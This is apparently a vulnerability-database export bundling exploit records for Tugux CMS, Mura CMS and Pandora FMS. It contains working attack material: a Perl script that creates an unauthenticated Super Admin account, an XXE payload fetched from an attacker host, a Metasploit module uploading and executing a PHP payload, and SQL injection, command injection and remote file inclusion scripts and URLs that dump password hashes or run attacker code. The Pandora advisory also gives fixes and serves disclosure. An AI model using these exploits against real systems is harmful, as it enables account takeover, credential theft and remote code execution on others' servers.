{"published": "2011-03-18T00:00:00", "id": "1337DAY-ID-15639", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:44:53", "bulletin": {"published": "2011-03-18T00:00:00", "id": "1337DAY-ID-15639", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:44:53"}}, "hash": "c799141072eeebc2925c3f610bd321b590cf8eb5b8993083d6f0770fe4448d92", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:44:53", "edition": 1, "title": "Tugux CMS 1.0_final Multiple Vulnerabilities", "href": "http://0day.today/exploit/description/15639", "modified": "2011-03-18T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/15639", "references": [], "reporter": "Aodrulez", "sourceData": "Vulnerable Web-App : Tugux CMS 1.0_final\r\nVulnerability : Multiple Vulnerabilities.\r\nAuthor : Aodrulez. (Atul Alex Cherian)\r\nEmail : f3arm3d3ar@gmail.com\r\nGoogle-Dork : \"Copyright 2010-2011 Tugux CMS\"\r\nTested on : Ubuntu 10.04\r\nWeb-App : http://sourceforge.net/projects/tuguxcms/\r\n \r\n \r\n+---------+\r\n| Details |\r\n+---------+\r\n \r\n1] SQLi\r\nExploit : http://localhost/latest.php?nid=9'[sqli]\r\n \r\n2] \"create_admin_parse.php\"\r\nVulnerability : Can be used to add Super Admin Accounts without\r\n any authentication. :)\r\n \r\n \r\n \r\n+--------------------+\r\n| Exploit (Perl Code)|\r\n+--------------------+\r\n(This Exploit will Add\r\na new Super Admin Account)\r\n \r\nuse HTTP::Request::Common qw(POST);\r\nuse LWP::UserAgent;\r\nuse LWP 5.64;\r\nmy $browser = LWP::UserAgent->new();\r\nmy $url=$ARGV[0];\r\nprint \"+----------------------------------------+\\n\";\r\nprint \"| Tugux CMS 1.0 Multiple Vulnerabilities |\\n\";\r\nprint \"+----------------------------------------+\\n\\n\";\r\nprint \"Author : Aodrulez.\\n\";\r\nprint \"Email : f3arm3d3ar\\@gmail.com\\n\";\r\nprint \"Google-Dork : \\\"Copyright 2010-2011 Tugux CMS\\\"\\n\";\r\nif(!$url)\r\n{die (\"\\nPlease enter the target url. Ex. perl $0 http://www.test.com\");}\r\nmy $exploit='/administrator/create_admin_parse.php';\r\nprint \"\\n[+] Creating a new Super Admin \\\\m/\";\r\n$response = HTTP::Request->new(POST => $url.$exploit) or die(\"\\n Connection Error!\");\r\n$response->content_type(\"application/x-www-form-urlencoded\");\r\n$response->content(\"username=Aodrulez&pass1=aod&type=a\");\r\nmy $data=$browser->request($response)->as_string;\r\nif($data!~m/HTTP\\/1.1 200 OK/){ die (\"\\n$url Not Vulnerable!\\n\");}\r\nprint \"\\n[!] Admin Username : Aodrulez\\n[!] Admin Password : aod\\n[!] Type : Super Admin.\\n\";\r\n \r\n \r\n \r\n+-------------------+\r\n| Greetz Fly Out To |\r\n+-------------------+\r\n \r\n \r\n1] Amforked() : My Mentor.\r\n2] The Blue Genius : My Boss.\r\n3] str0ke (milw0rm)\r\n4] www.orchidseven.com\r\n5] www.malcon.org\r\n6] www.isac.org.in\r\n \r\n \r\n+-------+\r\n| Quote |\r\n+-------+\r\n \r\n\"FREEDOM! FOREVER!\" - Aodrulez\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "75a2434c597ba21f6431c60f2801e13b", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "modified"}, {"hash": "bb40332c9ffb4964f341260e6cfce29e", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "61f72ad1eb6fc1c4cfd83aca1d16d478", "key": "title"}, {"hash": "a11e41b613d1f24843ed8c7c26920d4f", "key": "sourceData"}, {"hash": "933d4b93974432a71a0472e58295476f", "key": "sourceHref"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "e499ba7af3555f349fdd6206e97e6ada1b3c8a30af0862c9f57682eb65e774c8", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:144764", "PACKETSTORM:129830", "PACKETSTORM:96259"]}, {"type": "zdt", "idList": ["1337DAY-ID-28866", "1337DAY-ID-25206", "1337DAY-ID-23084", "1337DAY-ID-11274", "1337DAY-ID-4279"]}, {"type": "exploitdb", "idList": ["EDB-ID:43045", "EDB-ID:35731", "EDB-ID:15639"]}, {"type": "cve", "idList": ["CVE-2017-15639", "CVE-2010-4279"]}, {"type": "seebug", "idList": ["SSV:70305"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25206", "SECURITYVULNS:VULN:11274"]}, {"type": "nessus", "idList": ["PANDORA_FMS_AUTH_BYPASS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:100927", "OPENVAS:1361412562310100927"]}], "modified": "2018-03-06T03:37:39"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-06T03:37:39", "edition": 2, "title": "Tugux CMS 1.0_final Multiple Vulnerabilities", "href": "https://0day.today/exploit/description/15639", "modified": "2011-03-18T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/15639", "references": [], "reporter": "Aodrulez", "sourceData": "Vulnerable Web-App : Tugux CMS 1.0_final\r\nVulnerability : Multiple Vulnerabilities.\r\nAuthor : Aodrulez. (Atul Alex Cherian)\r\nEmail : [email\u00a0protected]\r\nGoogle-Dork : \"Copyright 2010-2011 Tugux CMS\"\r\nTested on : Ubuntu 10.04\r\nWeb-App : http://sourceforge.net/projects/tuguxcms/\r\n \r\n \r\n+---------+\r\n| Details |\r\n+---------+\r\n \r\n1] SQLi\r\nExploit : http://localhost/latest.php?nid=9'[sqli]\r\n \r\n2] \"create_admin_parse.php\"\r\nVulnerability : Can be used to add Super Admin Accounts without\r\n any authentication. :)\r\n \r\n \r\n \r\n+--------------------+\r\n| Exploit (Perl Code)|\r\n+--------------------+\r\n(This Exploit will Add\r\na new Super Admin Account)\r\n \r\nuse HTTP::Request::Common qw(POST);\r\nuse LWP::UserAgent;\r\nuse LWP 5.64;\r\nmy $browser = LWP::UserAgent->new();\r\nmy $url=$ARGV[0];\r\nprint \"+----------------------------------------+\\n\";\r\nprint \"| Tugux CMS 1.0 Multiple Vulnerabilities |\\n\";\r\nprint \"+----------------------------------------+\\n\\n\";\r\nprint \"Author : Aodrulez.\\n\";\r\nprint \"Email : f3arm3d3ar\\@gmail.com\\n\";\r\nprint \"Google-Dork : \\\"Copyright 2010-2011 Tugux CMS\\\"\\n\";\r\nif(!$url)\r\n{die (\"\\nPlease enter the target url. Ex. perl $0 http://www.test.com\");}\r\nmy $exploit='/administrator/create_admin_parse.php';\r\nprint \"\\n[+] Creating a new Super Admin \\\\m/\";\r\n$response = HTTP::Request->new(POST => $url.$exploit) or die(\"\\n Connection Error!\");\r\n$response->content_type(\"application/x-www-form-urlencoded\");\r\n$response->content(\"username=Aodrulez&pass1=aod&type=a\");\r\nmy $data=$browser->request($response)->as_string;\r\nif($data!~m/HTTP\\/1.1 200 OK/){ die (\"\\n$url Not Vulnerable!\\n\");}\r\nprint \"\\n[!] Admin Username : Aodrulez\\n[!] Admin Password : aod\\n[!] Type : Super Admin.\\n\";\r\n \r\n \r\n \r\n+-------------------+\r\n| Greetz Fly Out To |\r\n+-------------------+\r\n \r\n \r\n1] Amforked() : My Mentor.\r\n2] The Blue Genius : My Boss.\r\n3] str0ke (milw0rm)\r\n4] www.orchidseven.com\r\n5] www.malcon.org\r\n6] www.isac.org.in\r\n \r\n \r\n+-------+\r\n| Quote |\r\n+-------+\r\n \r\n\"FREEDOM! FOREVER!\" - Aodrulez\r\n\r\n\n\n# 0day.today [2018-03-06] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "60239d7d0281b04a08d86e60904da422", "key": "href"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "modified"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "75a2434c597ba21f6431c60f2801e13b", "key": "reporter"}, {"hash": "174eced874d80321eb2148fcb2b0e143", "key": "sourceData"}, {"hash": "1997d900240103756e62e39b1ae9bc20", "key": "sourceHref"}, {"hash": "61f72ad1eb6fc1c4cfd83aca1d16d478", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"packetstorm": [{"lastseen": "2017-10-27T14:05:49", "bulletinFamily": "exploit", "description": "", "modified": "2017-10-26T00:00:00", "published": "2017-10-26T00:00:00", "href": "https://packetstormsecurity.com/files/144764/Mura-CMS-Server-Side-Request-Forgery-XXE-Injection.html", "id": "PACKETSTORM:144764", "type": "packetstorm", "title": "Mura CMS Server-Side Request Forgery / XXE Injection", "sourceData": "`# Exploit Title: Mura CMS before 6.2 SSRF + XXE \n# Date: 30-10-2017 \n# Exploit Author: Anthony Cole \n# Vendor Homepage: http://www.getmura.com/ \n# Version: before 6.2 \n# Contact: http://twitter.com/acole76 \n# Website: http://twitter.com/acole76 \n# Tested on: Windows 2008 w/ Coldfusion 8 \n# CVE: CVE-2017-15639 \n# Category: webapps \n \n1. Description \n \nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack. \n \n \n2. Proof of Concept \n \nvulnerable file is on github, line 50: \nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm \n \nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500 \n \nExplanation of params \nsiteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\". \nrssurl - This is the URL you want Mura CMS to call out to. \n \nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80 \n \nThen create a file: \n \n<?xml version=\"1.0\" ?> \n<!DOCTYPE rss [ \n<!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\"> \n]> \n \n<rss version=\"2.0\"> \n<channel> \n<title>title</title> \n<link>link</link> \n<description>description</description> \n<generator>http://www.getmura.com</generator> \n<pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate> \n<language>en-us</language> \n<item> \n<title>Item title</title> \n<link>http://host/</link> \n<guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid> \n<pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate> \n<description>&send;</description> \n</item> \n</channel> \n</rss> \n \n3. Solution: \n \ndelete readRSS.cfm from the server. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144764/muracms-ssrfxxe.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-05T22:12:28", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "href": "https://packetstormsecurity.com/files/129830/Pandora-3.1-Auth-Bypass-Arbitrary-File-Upload.html", "id": "PACKETSTORM:129830", "type": "packetstorm", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability in Pandora v3.1 as \ndisclosed by Juan Galiana Lara. It also integrates with the built-in pandora \nupload which allows a user to upload arbitrary files to the '/images/' directory. \n \nThis module was created as an exercise in the Metasploit Mastery Class at Blackhat \nthat was facilitated by egypt and mubix. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Juan Galiana Lara', # Vulnerability discovery \n'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module \n'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module \n'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module \n'_flood <freshbones[at]gmail.com>', # Metasploit module \n'mubix <mubix[at]room362.com>', # Auth bypass and file upload \n'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload \n], \n'References' => \n[ \n['CVE', '2010-4279'], \n['OSVDB', '69549'], \n['BID', '45112'] \n], \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Automatic Targeting', { 'auto' => true }] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Nov 30 2010\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), \n], self.class) \nend \n \ndef check \n \nbase = target_uri.path \n \n# retrieve software version from login page \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php') \n}) \nif res and res.code == 200 \n#Tested on v3.1 Build PC100609 and PC100608 \nif res.body.include?(\"v3.1 Build PC10060\") \nreturn Exploit::CheckCode::Appears \nelsif res.body.include?(\"Pandora\") \nreturn Exploit::CheckCode::Detected \nend \nend \nreturn Exploit::CheckCode::Safe \nrescue ::Rex::ConnectionError \nprint_error(\"#{peer} - Connection failed\") \nend \nreturn Exploit::CheckCode::Unknown \n \nend \n \n# upload a payload using the pandora built-in file upload \ndef upload(base, file, cookies) \ndata = Rex::MIME::Message.new \ndata.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\") \ndata.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"') \ndata.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"') \ndata.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"') \ndata_post = data.to_s \ndata_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(base, 'index.php'), \n'cookie' => cookies, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'vars_get' => { \n'sec' => 'gsetup', \n'sec2' => 'godmode/setup/file_manager', \n}, \n'data' => data_post \n}) \n \nregister_files_for_cleanup(@fname) \nreturn res \nend \n \ndef exploit \n \nbase = target_uri.path \n@fname = \"#{rand_text_numeric(7)}.php\" \ncookies = \"\" \n \n# bypass authentication and get session cookie \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php'), \n'vars_get' => { \n'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3', \n'loginhash_user' => 'admin', \n'loginhash' => '1', \n}, \n}) \n \n# fix if logic \nif res and res.code == 200 \nif res.body.include?(\"Logout\") \ncookies = res.get_cookies \nprint_status(\"Login Bypass Successful\") \nprint_status(\"cookie monster = \" + cookies) \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\") \nend \nend \n \n# upload PHP payload to images/[fname] \nprint_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\") \nphp = %Q|<?php #{payload.encoded} ?>| \nbegin \nres = upload(base, php, cookies) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nif res and res.code == 200 \nprint_good(\"#{peer} - File uploaded successfully\") \nelse \nfail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\") \nend \n \n# retrieve and execute PHP payload \nprint_status(\"#{peer} - Executing payload (images/#{@fname})\") \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'images', \"#{@fname}\") \n}, 1) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129830/pandora_upload_exec.rb.txt"}, {"lastseen": "2016-12-05T22:20:47", "bulletinFamily": "exploit", "description": "", "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "href": "https://packetstormsecurity.com/files/96259/Pandora-FMS-Command-Injection-SQL-Injection-Path-Traversal.html", "id": "PACKETSTORM:96259", "type": "packetstorm", "title": "Pandora FMS Command Injection / SQL Injection / Path Traversal", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nPandora FMS Authentication Bypass and Multiple Input Validation \nVulnerabilities \n \nCVE IDs in this security advisory: \n \n1) Authentication bypass - CVE-2010-4279 \n2) OS Command Injection - CVE-2010-4278 \n3) SQL Injection - CVE-2010-4280 \n4) Blind SQL Injection - CVE-2010-4280 \n5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283 \n \n \n[+] Introduction \n \nPandora FMS (for Pandora Flexible Monitoring System) is a software \nsolution for monitoring computer networks. It allows monitoring in a \nvisual way the status and performance of several parameters from \ndifferent operating systems, servers, applications and hardware systems \nsuch as firewalls, proxies, databases, web servers or routers. \n \nIt can be deployed in almost any operating system. It features remote \nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use \nagents. An agent is available for each platform. It can also monitor \nhardware systems with a TCP/IP stack, such as load balancers, routers, \nnetwork switches, printers or firewalls. \n \nThis software has several servers that process and get information from \ndifferent sources, using WMI for gathering remote Windows information, a \npredictive server, a plug-in server which makes complex user-defined \nnetwork tests, an advanced export server to replicate data between \ndifferent sites of Pandora FMS, a network discovery server, and an SNMP \nTrap console. \n \nReleased under the terms of the GNU General Public License, Pandora FMS \nis free software. \n \n \n[+] Description and Proof of Concept \n \n \n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10 \n \nAn attacker could access to any account user, including admin, using the \n\"hash login\" authentication process. This kind of authentication method \nworks providing a username and a hash. The issue could be exploited \nremotely providing a username and the md5 of it when \n$config['loginhash_pwd'] is empty, that in fact is the default \nconfiguration. \n \nSnippet of vulnerable code in index.php: \n \n136 // Hash login process \n137 if (! isset ($config['id_user']) && isset ($_GET[\"loginhash\"])) { \n138 $loginhash_data = get_parameter(\"loginhash_data\", \"\"); \n139 $loginhash_user = get_parameter(\"loginhash_user\", \"\"); \n140 \n141 if ($loginhash_data == \nmd5($loginhash_user.$config[\"loginhash_pwd\"])) { \n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']); \n143 $_SESSION['id_usuario'] = $loginhash_user; \n144 $config[\"id_user\"] = $loginhash_user; \n \n \n \nProof of concept: \n \nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1 \n \nGot it! admin! :) \n \nBy default, any installation of this software allows unauthenticated \nattackers to perform an authentication bypass and a privilege escalation \nto admin. \n \n \n1.1) Additionally, a manual modification in order to use the hash_hmac \nfunction instead of the weak statement md5 ( $string . $KEY) is \nencouraged for security purposes. \n \nSnippet of code (index.php, version 3.1.1): \n \n145 // Hash login process \n(...) \n150 if ($config[\"loginhash_pwd\"] != \"\" && $loginhash_data == \nmd5($loginhash_user.$config[\"loginhash_pwd\"])) { \n \nIn line 150, use \nhash_hmac(\"sha256\",$loginhash_user,$config[\"loginhash_pwd\"]), instead of \nmd5($lioginhash_user.$config[\"loginhash_pwd\"]) \n \n \n2) OS Command Injection - CVE-2010-4278 - CVSS 9/10 \n \nThe layout parameter in file operation/agentes/networkmap.php is not \nproperly filtered and allows an attacker to inject OS commands. \n \nSnippet of vulnerable code (file operation/agentes/networkmap.php): \n \n32 $layout = (string) get_parameter ('layout', 'radial'); \n... \n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout; \n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size; \n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout; \n... \n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng \n- -o\".$filename_img.\" \".$filename_dot; \n163 $result = system ($cmd); \n \nPoC: \n \nhttp://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a; \nhttp://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id; \n \nIf we use vulnerability #1 (that permits bypass the authentication \nsystem and login as admin) with this issue, the CVSS will be 10/10. \n \n \n3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10 \n \nThe parameter id_group when get_agents_group_json is equal to 1 is \nvulnerable to SQL Injection attacks. \n \nPoC: \nhttp://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario \n \n \nExploit: \n \n# Pandora Flexible Monitoring System SQL Injection PoC \n# Juan Galiana Lara \n# Gets the list of users and password from the database \n# \n#configure cookie&host before use it \n#usage \n#python sqlinj_users.py \n#admin:75b756ff2785ea8bb9ae02c13b6a71f1 \n#... \n \nimport json \nimport urllib2 \n \nheaders = {\"Cookie\": \"PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o\"} \n \nurl = \"http://HOST/pandora_console/ajax.php\" \nurl+= \n\"?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1\" \nurl+= \n\"/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\" \n \nreq = urllib2.Request(url,headers=headers) \nresp = urllib2.urlopen(req) \n \nusers = json.read(resp.read()) \nfor user in users: \nprint(user[\"id_agente\"]+\":\"+user[\"nombre\"]) \n \n \nThe fix to these kind of issues was the implementation of a generic \nfilter against sql injection. A proper fix is planned for a major version. \n \n \n4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10 \n \nThe parameter group_id of operation/agentes/estado_agente.php is \nvulnerable to blind sql injection. \n \n \nPoC: \nhttp://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281 \n \n \nExploit: \n \n#!/bin/bash \n# Pandora Flexible Monitoring System Blind SQL Injection PoC \n# Juan Galiana Lara \n# Gets the md5 hash password from a specific user \n# \n#configure host,cookie&group_id before use it \n#usage \n#$ ./getpassword.sh \n#74b444ff2785ea8bb9ae02c13b6a71f1 \n \nHOST=\"HOST\" \nTARGET_USER=\"0x61646d696e\" #admin \nPATTERN=\"Interval\" \nCOOKIE=\"rq842tci6e5ib7t918c6sv1ml4\" \nCHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v \nw x y z) \nGROUP_ID=2 \n \nj=1 \nwhile [[ $j -lt 33 ]]; do \ni=0 \nwhile [[ $i -lt ${#CHARSET[@]} ]]; do \nc=$(printf '%d' \"'${CHARSET[$i]}\") \n \nURL=\"http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\"; \ncurl $URL --cookie \"PHPSESSID=$COOKIE\" 2> /dev/null | grep -q \n$PATTERN; \nif [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi; \nlet i++ \ndone; \nif [[ $i -eq ${#CHARSET[@]} ]]; then echo \"Something went wrong!\"; \nexit 1; fi \nlet j++; \ndone \necho \nexit 0 \n \n \nThe fix to these kind of issues was the implementation of a generic \nfilter against sql injection. A proper fix is planned for a major version. \n \n \n5) Path Traversal: \n \n5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) - \nCVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10 \n \nParameter 'page' of ajax.php is not properly sanitizing user-supplied \ninput. The function safe_url_extraclean is filtering ':' character, and \nit doesn't allow to use the string \"http://\" to create urls, but allows \n'/' character and an attacker could reference remote resources via \nWindows UNC files, using //servername//resource/file \n \nNote that the first check in safe_url_extraclean is filtering '://', so \nwe can bypass the filter easily doing http://http://url, and it only \nstrip the first protocol://. However, the last preg_replace strips the : \ncharacter. \n \nProof of concept: \n \nUNC: http://servername/pandora_console/ajax.php?page=//server/share/test \n \nAs well, ajax.php allows to include any php file in the disk \n \nfilesystem: \nhttp://servername/pandora_console/ajax.php?page=../../../../../directory/file \n \nCharacter %00 is not allowed due safe_url_extraclean function filtering, \nand is not possible to include other files distinct that php files, but \nstill allows . and / characters. \n \n \n5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283 \n- - CVSS 7.9/10 \n \nAn attacker can inject arbitrary PHP code and execute it remotely due \nargv[1] parameter is not filtered in file pandora_diag.php. \n \nPoC: \nhttp://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00 \n \nNote: that issue needs register_globals set to On to be exploitable. \n \n \n5.3 - Path traversal & Local file inclusion vulnerabilities - \nCVE-2010-4282 - CVSS 6.8/10 \n \nAn attacker can include arbitrary files of the filesystem via id \nparameter in file pandora_help.php. \n \n \nSnippet of vulnerable code: \n \n24 $id = get_parameter ('id'); \n25 \n26 /* Possible file locations */ \n27 $files = array \n($config[\"homedir\"].\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\", \n28 \n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\", \n29 \n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/en/help_\".$id.\".php\", \n30 $config[\"homedir\"].\"/include/help/en/help_\".$id.\".php\"); \n31 $help_file = ''; \n32 foreach ($files as $file) { \n33 if (file_exists ($file)) { \n34 $help_file = $file; \n35 break; \n36 } \n37 } \n... \n62 require_once ($help_file); \n \n \nProof of concept: \n \nhttp://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00 \n \nThis code is platform dependent bug, you can read more at \nhttp://seclists.org/fulldisclosure/2010/Jul/137 \nOnly works in windows systems, an attacker can include local file using \n../ characters due parameter id is not filtered \nIf magic_quotes_gpc is Off, arbitrary files can be included, like \nboot.ini using NULL character (%00), if not, only php files are allowed \n \n \n5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 \n- - CVSS 8.0/10 \n \nIn file operation/agentes/networkmap.php the 'layout' parameter is \nhandled in an insecure way and it is used to write and delete files on \nthe filesystem. \nAn attacker could use this parameter to write in arbitrary paths and \neven remove files. \n \nSnippet of vulnerable code: \n \n32 $layout = (string) get_parameter ('layout', 'radial'); \n... \n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout; \n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size; \n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout; \n... \n157 $fh = @fopen ($filename_dot, 'w'); \n158 if ($fh === false) { \n159 $result = false; \n160 } else { \n161 fwrite ($fh, $graph); \n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng \n- -o\".$filename_img.\" \".$filename_dot; \n163 $result = system ($cmd); \n164 fclose ($fh); \n165 unlink ($filename_dot); \n166 } \n... \n178 require ($filename_map); \n \n \nCharacter sequences '../' could be used to write files (due -o parameter \nin lines 162 and 163), as well as potentially remove files (line 157, \n161 and 165) or include them (line 178) \nAs well like in 5.3 this issue is only exploitable in windows \nenvironments because the same reason. \n \n \n[+] Impact \n \nAn attacker can execute commands of the operating system, inject remote \ncode in the context of the application, get arbitrary files from the \nfilesystem or extract any data of the database including passwords and \nconfidential information about the monitored network/systems. Also it is \npossible to bypass the authentication or scale privileges to became \nadmin, gaining full control of the web application and web server. These \nvulnerabilities have a high impact to the confidentiality, integrity, \nand availability of the system. \n \n \n[+] Systems affected \n \nVersions prior and including 3.1 of Pandora FMS are affected \n \n \n[+] Solution \n \nApply the security fix for version 3.1: \nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download \n \n \nOr upgrade to version 3.1.1 from \nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/ \n \n \n[+] Timeline \n \nAgo 2010: First contact to vendor \nAgo 2010: Confirmation of vendor \nSept 2010: Second contact: SQL Injection vulnerabilities 